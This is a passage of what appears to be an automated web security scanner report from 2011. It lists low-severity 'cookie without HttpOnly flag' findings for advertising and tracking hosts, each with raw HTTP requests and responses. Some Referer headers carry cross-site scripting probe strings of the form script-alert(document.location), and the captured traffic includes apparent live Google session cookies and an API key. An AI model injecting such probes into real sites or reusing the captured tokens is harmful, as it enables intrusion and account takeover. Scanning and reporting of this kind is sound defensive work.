User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; ih="b!!!!<!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; vuday1=Ve/>1!4j#(Ncl]A; BX=ei08qcd75vc4d&b=3&s=8s&t=246; liday1=$4^M3!4j#(oZ>LE

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:03:53 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!%=4X0s!#eCK!!!!%=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; path=/; expires=Wed, 11-Sep-2013 13:03:53 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 13:03:53 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

5.7. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

5.8. http://affiliates.lynda.com/42/510/50/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliates.lynda.com
Path:   /42/510/50/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /42/510/50/ HTTP/1.1
Host: affiliates.lynda.com
Proxy-Connection: keep-alive
Referer: http://drupalsn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 12 Sep 2011 12:48:52 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_vtc=1c6d88f30e0ecdccd9fbf10eb320e373; expires=Wed, 12-Oct-2011 12:48:52 GMT; path=/
Location: http://files.lynda.com/files/lol_partners/art/lynda_bnr_180x150_growBrain.gif
X-Server-Name: www@dc1dtweb150
Content-Length: 0
Content-Type: image/gif


5.9. http://api.bizographics.com/v1/profile.redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=ZDDH4OisxVKDXDYTFVciiWVtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KWxZzbyauJoDaj5XcunNcMDa7Re6IGD4lIvNliiTsQ3d0Ad6xyMUDLG4HisD7PuAiisYPXoxU8ZPy3Exo4N71w46SKb0NrpeKvDEEAHRkUP4DRqbp7KchoR8KSjE5cmLaumWulAJAT7BX2HrsROqwTV75bDCe4W2moTMPW6Nj5X3Td87pcdJDAlOFM4SE3xQyPhdqGoP8BGM4wnZd9rxFhue7CnPt7OKf3925MlVpUzFqnOU3CJ2wtdwM8iiVTP0Et7iiJPsiim5vOPNb1QJipLd4ekU1f7MrQxrTtB1Wxn268X1nipp3OMCDTtSipisN9MTZe7RE8f54Pmyis0b2kXPJlCH2Dc5iivgsHGiiGKQLeexC7h8LZyqRAWM4Y0T5rNbhrhiprNS9j4rsWfOeTjexKjZ6ZI4Zomlgie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 12 Sep 2011 13:06:08 GMT
Location: http://dts1.raasnet.com/dts/bizo/in?industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXM6UUqwNaQIaj5XcunNcMDa7Re6IGD4lJwvYvTFPJeCAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRaQakHSuYMDekIwbdwzisbvEVUJBxdqAyBFiiNVUlT95AiiktrG07sTpWxGp85dzvukEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive


5.10. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk;Domain=.google.com;Path=/;Expires=Thu, 09-Sep-2021 13:04:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 12 Sep 2011 13:04:27 GMT
Date: Mon, 12 Sep 2011 13:04:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5398

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23579912-2b1b2e17';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

5.11. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=172392041&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.dome9.com%252F%26jsref%3D%26rnd%3D1315849265708&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.dome9.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 12 Sep 2011 12:40:56 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 11-Sep-2013 12:40:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


5.12. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

5.13. http://btg.mtvnservices.com/aria/guid.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://btg.mtvnservices.com
Path:   /aria/guid.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aria/guid.html HTTP/1.1
Host: btg.mtvnservices.com
Proxy-Connection: keep-alive
